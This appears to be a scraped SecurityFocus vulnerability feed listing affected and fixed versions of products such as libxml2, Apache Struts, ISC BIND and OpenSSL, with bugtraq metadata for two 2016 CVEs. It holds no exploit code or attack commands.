XMLSoft Libxml2 1.8.4
XMLSoft Libxml2 1.8.3
XMLSoft Libxml2 1.8.1
XMLSoft Libxml2 1.8.1
XMLSoft Libxml2 1.7.4
XMLSoft Libxml2 1.7
XMLSoft Libxml2 2.9.3
XMLSoft Libxml2 2.9.2
XMLSoft Libxml2 2.9.1
XMLSoft Libxml2 2.6.29
XMLSoft Libxml2 2.6.28
XMLSoft Libxml2 2.6.27
XMLSoft Libxml2 2.6.25
XMLSoft Libxml2 2.6.0
XMLSoft Libxml2 2.5.7
XMLSoft Libxml2 2.5.0
XMLSoft Libxml2 2.4.25
XMLSoft Libxml2 2.4.1
XMLSoft Libxml2 2.3.3
XMLSoft Libxml2 2.3.2
XMLSoft Libxml2 2.3.11
XMLSoft Libxml2 2.3.1
XMLSoft Libxml2 2.3.0
XMLSoft Libxml2 2.2.9
XMLSoft Libxml2 2.2.8
XMLSoft Libxml2 2.2.2
XMLSoft Libxml2 2.2.1
XMLSoft Libxml2 2.2.0
XMLSoft Libxml2 2.1.1
XMLSoft Libxml2 2.1.0
XMLSoft Libxml2 2.0.0
XMLSoft Libxml2 1.8.7
XMLSoft Libxml2 1.8.6
XMLSoft Libxml2 1.8.16
XMLSoft Libxml2 1.8.13
XMLSoft Libxml2 1.7.3
XMLSoft Libxml2 1.7.2
XMLSoft Libxml2 1.7.1
Slackware Linux 14.1 x86_64
Slackware Linux 14.1
Slackware Linux 14.0 x86_64
Slackware Linux 14.0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle Linux 7
Oracle Linux 6
IBM SmartCloud Entry 3.2 Fix Pack 19
IBM SmartCloud Entry 3.2 Fix Pack 18
IBM SmartCloud Entry 3.2 fix pack 14
IBM SmartCloud Entry 3.2 fix pack 13
IBM SmartCloud Entry 3.2 Fix Pack 11
IBM SmartCloud Entry 3.2 Appliance fix pack 2
IBM SmartCloud Entry 3.2 Appliance fix pack 1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1 FP 9
IBM SmartCloud Entry 3.1 fix pack 13
IBM SmartCloud Entry 3.1 Fix Pack 10
IBM SmartCloud Entry 3.1 Appliance fix pack 2
IBM SmartCloud Entry 3.1 Appliance fix pack 1
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 2.4 Fix Pack 2
IBM SmartCloud Entry 2.4 Appliance fix pack 6
IBM SmartCloud Entry 2.4 Appliance fix pack 4
IBM SmartCloud Entry 2.3 Fix Pack 2
IBM SmartCloud Entry 2.3 Fix Pack 1
IBM SmartCloud Entry 2.3 Appliance fix pack 6
IBM SmartCloud Entry 2.3 Appliance fix pack 4
IBM SmartCloud Entry 2.2 Fix Pack 2
IBM SmartCloud Entry 2.2 Fix Pack 1
IBM SmartCloud Entry 2.2 Appliance fix pack 6
IBM SmartCloud Entry 2.2 Appliance fix pack 4
IBM SmartCloud Entry 2.2
IBM SmartCloud Entry 3.2.0.4 FixPack 15
IBM SmartCloud Entry 3.2.0.4 FixPack 13
IBM SmartCloud Entry 3.2.0.4 fix pack 11
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4 Appliance FP
IBM SmartCloud Entry 3.2.0.4
IBM SmartCloud Entry 3.2.0.3
IBM SmartCloud Entry 3.2.0.2
IBM SmartCloud Entry 3.2.0.1
IBM SmartCloud Entry 3.2.0.0
IBM SmartCloud Entry 3.2.0 fix pack 9
IBM SmartCloud Entry 3.2.0 fix pack 8
IBM SmartCloud Entry 3.2.0 fix pack 10
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.1.0.4 FixPack 15
IBM SmartCloud Entry 3.1.0.4 FixPack 12
IBM SmartCloud Entry 3.1.0.4 fix pack 10
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4 Appliance FP
IBM SmartCloud Entry 3.1.0.4
IBM SmartCloud Entry 3.1.0.3
IBM SmartCloud Entry 3.1.0.2
IBM SmartCloud Entry 3.1.0.1
IBM SmartCloud Entry 3.1.0.0
IBM SmartCloud Entry 3.1.0 fix pack 9
IBM SmartCloud Entry 3.1.0 fix pack 8
IBM SmartCloud Entry 3.1 FP 10
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM SmartCloud Entry 2.4.0.5 JRE Update 5
IBM SmartCloud Entry 2.4.0.5 FixPack 5
IBM SmartCloud Entry 2.4.0.5 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance FP
IBM SmartCloud Entry 2.4.0.4 Appliance Fi
IBM SmartCloud Entry 2.4.0.4 Appliance Fi
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0 fix pack 1
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.4 Appliance FP
IBM SmartCloud Entry 2.3.0.4 Appliance FP
IBM SmartCloud Entry 2.3.0.4 Appliance Fi
IBM SmartCloud Entry 2.3.0.4 Appliance Fi
IBM SmartCloud Entry 2.3.0.3 JRE Update 5
IBM SmartCloud Entry 2.3.0.3 JRE Update 4
IBM SmartCloud Entry 2.3.0.3 FixPack 3
IBM SmartCloud Entry 2.3.0.3 Appliance FP
IBM SmartCloud Entry 2.3.0.3 Appliance FP
IBM SmartCloud Entry 2.3.0
IBM SmartCloud Entry 2.2.0.4 Appliance FP
IBM SmartCloud Entry 2.2.0.4 Appliance FP
IBM SmartCloud Entry 2.2.0.4 Appliance Fi
IBM SmartCloud Entry 2.2.0.4 Appliance Fi
IBM SmartCloud Entry 2.2.0.3 Appliance FP
IBM SmartCloud Entry 2.2.0.3 Appliance FP
IBM Security Privileged Identity Manager 2.0
IBM Security Network Protection 5.3.2
IBM Security Network Protection 5.3.1
IBM Security Network Protection 5.3.2.3
IBM Security Network Protection 5.3.2.2
IBM Security Network Protection 5.3.2.1
IBM Security Network Protection 5.3.1.9
IBM Security Network Protection 5.3.1.8
IBM Security Network Protection 5.3.1.7
IBM Security Network Protection 5.3.1.6
IBM Security Network Protection 5.3.1.5
IBM Security Network Protection 5.3.1.4
IBM Security Network Protection 5.3.1.3
IBM Security Network Protection 5.3.1.2
IBM Security Network Protection 5.3.1.1
IBM Security Guardium 10.1
IBM Security Guardium 10
IBM Security Access Manager for Web 8.0.1
IBM Security Access Manager for Web 8.0 3
IBM Security Access Manager for Web 8.0 2
IBM Security Access Manager for Web 8.0.1.4
IBM Security Access Manager for Web 8.0.1.3
IBM Security Access Manager for Web 8.0.1.2
IBM Security Access Manager for Web 8.0.1.1
IBM Security Access Manager for Web 8.0.1.0
IBM Security Access Manager for Web 8.0.0.5
IBM Security Access Manager for Web 8.0.0.4
IBM Security Access Manager for Web 8.0.0.0
IBM Security Access Manager for Web 7.0
IBM Security Access Manager for Mobile 8.0.1
IBM Security Access Manager for Mobile 8.0.1.4
IBM Security Access Manager for Mobile 8.0.1.3
IBM Security Access Manager for Mobile 8.0.1.2
IBM Security Access Manager for Mobile 8.0.1.1
IBM Security Access Manager for Mobile 8.0.0.5
IBM Security Access Manager for Mobile 8.0.0.4
IBM Security Access Manager for Mobile 8.0.0.3
IBM Security Access Manager for Mobile 8.0.0.2
IBM Security Access Manager for Mobile 8.0.0.1
IBM Security Access Manager for Mobile 8.0.0.0
IBM Security Access Manager for Mobile 8.0
IBM Security Access Manager 9.0.1.0
IBM Security Access Manager 9.0.0.1
IBM Security Access Manager 9.0
IBM Rational Systems Tester 3.3.0.7 Interim Fix
IBM Rational Systems Tester 3.3.0.7 Interim Fix
IBM Rational Systems Tester 3.3.0.7 Interim Fix
IBM Rational Systems Tester 3.3.0.7 Interim Fix
IBM Rational Systems Tester 3.3.0.7
IBM Rational Systems Tester 3.3.0.6
IBM Rational Systems Tester 3.3.0.5
IBM Rational Systems Tester 3.3.0.4
IBM Rational Systems Tester 3.3.0.3
IBM Rational Systems Tester 3.3.0.2
IBM Rational Systems Tester 3.3.0.1
IBM Rational Systems Tester 3.3
IBM RackSwitch G8332 7.7.23.0
IBM RackSwitch G8316 7.9.17.0
IBM RackSwitch G8264T 7.9.17.0
IBM RackSwitch G8264CS 7.8.14.0
IBM RackSwitch G8264 7.9.17.0
IBM RackSwitch G8264 7.11.7.0
IBM RackSwitch G8124/G8124-E 7.9.17.0
IBM RackSwitch G8124/G8124-E 7.11.7.0
IBM RackSwitch G8052 7.9.17.0
IBM RackSwitch G8052 7.11.7.0
IBM PowerKVM 3.1
IBM PowerKVM 2.1
IBM MQ Appliance M2001
IBM MQ Appliance M2000
IBM Lotus Protector for Mail Security 2.8 0
IBM Lotus Protector for Mail Security 2.8.1.0
IBM Lotus Protector for Mail Security 2.8.1
IBM DataPower Gateways 7.5.1.1
IBM DataPower Gateways 7.5.1.0
IBM DataPower Gateways 7.5.0.2
IBM DataPower Gateways 7.5.0.1
IBM DataPower Gateways 7.5.0.0
IBM DataPower Gateways 7.2.0.8
IBM DataPower Gateways 7.2.0.6
IBM DataPower Gateways 7.2.0.5
IBM DataPower Gateways 7.2.0.4
IBM DataPower Gateways 7.2.0.3
IBM DataPower Gateways 7.2.0.2
IBM DataPower Gateways 7.2.0.1
IBM DataPower Gateways 7.2.0.0
HP IceWall Federation Agent 3.0
eSignal eSignal 6.0.2
Bluecoat Security Analytics Platform 7.1
Bluecoat Security Analytics Platform 7.0
Bluecoat Security Analytics Platform 6.6
Bluecoat Proxysg 6.6
Bluecoat Proxysg 6.5
Bluecoat Norman Network Protection 5.3
Bluecoat Industrial Control Systems Network Scanner 5.3
Bluecoat Industrial Control System Protection 5.3
Bluecoat Director 6.1
Bluecoat AuthConnector 2.5
Bluecoat Advanced Secure Gateway 6.6
Apple watchOS 2.2.1
Apple watchOS 2.0.1
Apple watchOS 1.0.1
Apple watchOS 2.2
Apple watchOS 2.1
Apple watchOS 2.0
Apple watchOS 1.0
Apple Watch 0
Apple Mac Os X 10.11.3
Apple Mac Os X 10.11.2
Apple Mac Os X 10.11.1
Apple Mac Os X 10.11.5
Apple Mac Os X 10.11.4
Apple Mac Os X 10.11
Apple iTunes 12.3.2
Apple iTunes 12.3.1
Apple iTunes 11.2.1
Apple iTunes 11.1.5
Apple iTunes 11.1.4
Apple iTunes 11.1.3
Apple iTunes 11.1.2
Apple iTunes 11.1.1
Apple iTunes 11.0.5
Apple iTunes 11.0.4
Apple iTunes 11.0.2
Apple iTunes 10.6.3
Apple iTunes 10.6.1
Apple iTunes 10.5.1
Apple iTunes 10.1.2
Apple iTunes 9.2.1
Apple iTunes 9.0.2
Apple iTunes 9.0.1 .8
Apple iTunes 9.0.1
Apple iTunes 9.0
Apple iTunes 7.3.2
Apple iTunes 7.3.1
Apple iTunes 7.3
Apple iTunes 7.0.2
Apple iTunes 6.0.5
Apple iTunes 6.0.4
Apple iTunes 6.0.3
Apple iTunes 6.0.1
Apple iTunes 6.0
Apple iTunes 5.0
Apple iTunes 4.8
Apple iTunes 4.7
Apple iTunes 4.6
Apple iTunes 4.5
Apple iTunes 4.2 .72
Apple iTunes 9.2
Apple iTunes 9.1.1
Apple iTunes 9.1
Apple iTunes 9.0.3
Apple iTunes 8.2
Apple iTunes 8.1
Apple iTunes 8.0.2.20
Apple iTunes 7.4
Apple iTunes 12.4
Apple iTunes 12.3
Apple iTunes 12.2
Apple iTunes 12.0.1
Apple iTunes 11.2
Apple iTunes 11.1
Apple iTunes 11.0.3
Apple iTunes 11.0.1
Apple iTunes 11.0.0.163
Apple iTunes 11.0
Apple iTunes 10.7
Apple iTunes 10.6.1.7
Apple iTunes 10.6
Apple iTunes 10.5.3
Apple iTunes 10.5.2
Apple iTunes 10.5.1.42
Apple iTunes 10.5
Apple iTunes 10.4.1.10
Apple iTunes 10.4.1
Apple iTunes 10.4.0.80
Apple iTunes 10.4
Apple iTunes 10.3.1
Apple iTunes 10.3
Apple iTunes 10.2.2.12
Apple iTunes 10.2.2
Apple iTunes 10.2
Apple iTunes 10.1.1.4
Apple iTunes 10.1.1
Apple iTunes 10.1
Apple iTunes 10.0.1
Apple iTunes 10
Apple iPod Touch 0
Apple iPhone 0
Apple iPad 0
Apple iOS 5 0
Apple iOS 4 0
Apple iOS 9.3.2
Apple iOS 9.3.1
Apple iOS 9.2.1
Apple iOS 9.0.2
Apple iOS 9.0.1
Apple iOS 8.4.1
Apple iOS 7.2
Apple iOS 7.0.6
Apple iOS 7.0.5
Apple iOS 7.0.3
Apple iOS 7.0.2
Apple iOS 7.0.1
Apple iOS 6.3.1
Apple iOS 6.1.6
Apple iOS 6.1.4
Apple iOS 6.1.3
Apple iOS 4.2.1
Apple iOS 4.0.2
Apple iOS 4.0.1
Apple iOS 3.2.2
Apple iOS 3.2.1
Apple iOS 9.3
Apple iOS 9.2
Apple iOS 9.1
Apple iOS 9
Apple iOS 8.4
Apple iOS 8.3
Apple iOS 8.2
Apple iOS 8.1.3
Apple iOS 8.1.2
Apple iOS 8.1.1
Apple iOS 8.1
Apple iOS 8
Apple iOS 7.1.2
Apple iOS 7.1.1
Apple iOS 7.1
Apple iOS 7.0.4
Apple iOS 7
Apple iOS 6.1
Apple iOS 6.0.2
Apple iOS 6.0.1
Apple iOS 6
Apple iOS 5.1.1
Apple iOS 5.1
Apple iOS 5.0.1
Apple iOS 5
Apple iOS 4.3.5
Apple iOS 4.3.4
Apple iOS 4.3.3
Apple iOS 4.3.2
Apple iOS 4.3.1
Apple iOS 4.3
Apple iOS 4.2.9
Apple iOS 4.2.8
Apple iOS 4.2.7
Apple iOS 4.2.6
Apple iOS 4.2.5
Apple iOS 4.2.10
Apple iOS 4.2
Apple iOS 4.1
Apple iOS 4
Apple iOS 3.2
Apple iOS 3.1
Apple iOS 3.0
Apple iOS 2.1
Apple iOS 2.0
Not Vulnerable: XMLSoft Libxml2 2.9.4
IBM Security Privileged Identity Manager 2.0.2 Fixpack 8
IBM Security Network Protection 5.3.2.4
IBM Security Network Protection 5.3.1.10
Apple watchOS 2.2.2
Apple Mac Os X 10.11.6
Apple Mac Os X Security Update 2016
Apple iTunes 12.4.2
Apple iOS 9.3.3


SecurityFocus Vulnerabilities

Vulnerable: IBM Opportunity Detect 9.1.1
IBM Opportunity Detect 10.0
BSD OGNL 3.0
Apache Struts 2.3.24
Apache Struts 2.3.4 1
Apache Struts 2.3.4
Apache Struts 2.2.3
Apache Struts 2.2.1 1
Apache Struts 2.2
Apache Struts 2.1.8 .1
Apache Struts 2.1.8
Apache Struts 2.1.6
Apache Struts 2.1.5
Apache Struts 2.1.2
Apache Struts 2.1.1
Apache Struts 2.1.1
Apache Struts 2.1
Apache Struts 2.0.14
Apache Struts 2.0.12
Apache Struts 2.0.11 .2
Apache Struts 2.0.11 .1
Apache Struts 2.0.11
Apache Struts 2.0.10
Apache Struts 2.0.9
Apache Struts 2.0.8
Apache Struts 2.0.7
Apache Struts 2.0.6
Apache Struts 2.0.5
Apache Struts 2.0.4
Apache Struts 2.0.3
Apache Struts 2.0.2
Apache Struts 2.0.1
Apache Struts 2.0
Apache Struts 2.3.8
Apache Struts 2.3.7
Apache Struts 2.3.24.1
Apache Struts 2.3.20.3
Apache Struts 2.3.20.2
Apache Struts 2.3.20.1
Apache Struts 2.3.20
Apache Struts 2.3.16.3
Apache Struts 2.3.16.2
Apache Struts 2.3.16.1
Apache Struts 2.3.16
Apache Struts 2.3.15.3
Apache Struts 2.3.15.2
Apache Struts 2.3.15.1
Apache Struts 2.3.15
Apache Struts 2.3.14.3
Apache Struts 2.3.14.2
Apache Struts 2.3.14.1
Apache Struts 2.3.14
Apache Struts 2.3.1.2
Apache Struts 2.3.1.1
Apache Struts 2.3.1
Apache Struts 2.2.3.1
Apache Struts 2.1.4
Apache Struts 2.1.3
Apache Struts 2.0.13


SecurityFocus Vulnerabilities

Vulnerable: SuSE OpenStack Cloud 5
SuSE Manager Proxy 2.1
SuSE Manager 2.1
SuSE Linux Enterprise Software Development Kit 12 SP1
SuSE Linux Enterprise Software Development Kit 11 SP4
SuSE Linux Enterprise Server for SAP 12
SuSE Linux Enterprise Server 12-LTSS
SuSE Linux Enterprise Server 12 SP1
SuSE Linux Enterprise Server 11 SP4
SuSE Linux Enterprise Server 11 SP3 LTSS
SuSE Linux Enterprise Server 11 SP2 LTSS
SuSE Linux Enterprise Point of Sale 11-SP3
SuSE Linux Enterprise Desktop 12 SP1
SuSE Linux Enterprise Debuginfo 11 SP4
SuSE Linux Enterprise Debuginfo 11 SP3
SuSE Linux Enterprise Debuginfo 11 SP2
Redhat Enterprise Linux Workstation Optional 6
Redhat Enterprise Linux Workstation 6
Redhat Enterprise Linux Server Optional 6
Redhat Enterprise Linux Server 6
Redhat Enterprise Linux HPC Node Optional 6
Redhat Enterprise Linux HPC Node 6
Redhat Enterprise Linux Desktop Optional 6
Redhat Enterprise Linux Desktop 6
Redhat Enterprise Linux Desktop 5 client
Redhat Enterprise Linux Client Optional 7
Redhat Enterprise Linux 7 Client
Redhat Enterprise Linux 5 Server
Oracle Enterprise Linux 7
Oracle Enterprise Linux 5
ISC BIND 9.6
ISC BIND 9.5.1 P3
ISC BIND 9.5.1 P1
ISC BIND 9.5 a2
ISC BIND 9.5 a1
ISC BIND 9.4.3 P3
ISC BIND 9.4.3
ISC BIND 9.4.1 -P1
ISC BIND 9.4.1
ISC BIND 9.4 rc2
ISC BIND 9.4 rc1
ISC BIND 9.4 b4
ISC BIND 9.4 b3
ISC BIND 9.4 b2
ISC BIND 9.4 b1
ISC BIND 9.4 a6
ISC BIND 9.4 a5
ISC BIND 9.4 a4
ISC BIND 9.4 a3
ISC BIND 9.4 a2
ISC BIND 9.4 a1
ISC BIND 9.4
ISC BIND 9.3.6 P1
ISC BIND 9.3.6
ISC BIND 9.3.5
ISC BIND 9.3.4
ISC BIND 9.3.3 rc3
ISC BIND 9.3.3 rc2
ISC BIND 9.3.3 rc1
ISC BIND 9.3.3 b1
ISC BIND 9.3.3 b
ISC BIND 9.3.3
ISC BIND 9.3.2 -P2
ISC BIND 9.3.2 -P1
ISC BIND 9.3.2
ISC BIND 9.3.1
ISC BIND 9.3
ISC BIND 9.2.8
ISC BIND 9.2.7 rc3
ISC BIND 9.2.7 rc2
ISC BIND 9.2.7 rc1
ISC BIND 9.2.7 b1
ISC BIND 9.2.7
ISC BIND 9.2.6 -P2
ISC BIND 9.2.6 -P1
ISC BIND 9.2.6
ISC BIND 9.2.5
ISC BIND 9.2.4
ISC BIND 9.2.3
ISC BIND 9.2.2
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
ISC BIND 9.1.3
ISC BIND 9.1.2
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ Redhat Linux 7.1 ia64
+ Redhat Linux 7.1 i386
+ Redhat Linux 7.1 alpha
+ Redhat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
ISC BIND 9.0.1
ISC BIND 9.0
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
ISC BIND 9.7.1-P2
ISC BIND 9.7.1 P1
ISC BIND 9.7.1
ISC BIND 9.7.0 P2
ISC BIND 9.7.0
ISC BIND 9.6.1-P3
ISC BIND 9.6.1-P2
ISC BIND 9.6.0-P1
ISC BIND 9.5.2-P2
ISC BIND 9.5.2-P1
ISC BIND 9.5.1b1
ISC BIND 9.5.0b2
ISC BIND 9.5.0b1
ISC BIND 9.5.0a7
ISC BIND 9.5.0a6
ISC BIND 9.5.0a5
ISC BIND 9.5.0a4
ISC BIND 9.5.0a3
ISC BIND 9.5.0-P2-W2
ISC BIND 9.5.0-P2-W1
ISC BIND 9.5.0-P2
ISC BIND 9.4.3b2
ISC BIND 9.4.3-P5
ISC BIND 9.4.3-P4
ISC BIND 9.4.3-P1
ISC BIND 9.4.2-P2-W2
ISC BIND 9.4.2-P2-W1
ISC BIND 9.4.2-P2
ISC BIND 9.3.5-P2-W2
ISC BIND 9.3.5-P2-W1
ISC BIND 9.3.5-P2
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
CentOS CentOS 5


SecurityFocus Vulnerabilities

Cisco IOS XR Software CVE-2016-6421 Denial of Service Vulnerability

Bugtraq ID: 93212
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6421
Remote: Yes
Local: No
Published: Sep 28 2016 12:00AM
Updated: Sep 29 2016 12:01AM
Credit: Cisco
Vulnerable: Cisco IOS XR Software 0
Not Vulnerable:


Bugtraq ID: 93153
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6306
Remote: No
Local: Yes
Published: Sep 23 2016 12:00AM
Updated: Sep 25 2016 12:00AM
Credit: Shi Lei (Gear Team, Qihoo 360 Inc.)
Vulnerable: OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
Not Vulnerable: OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u

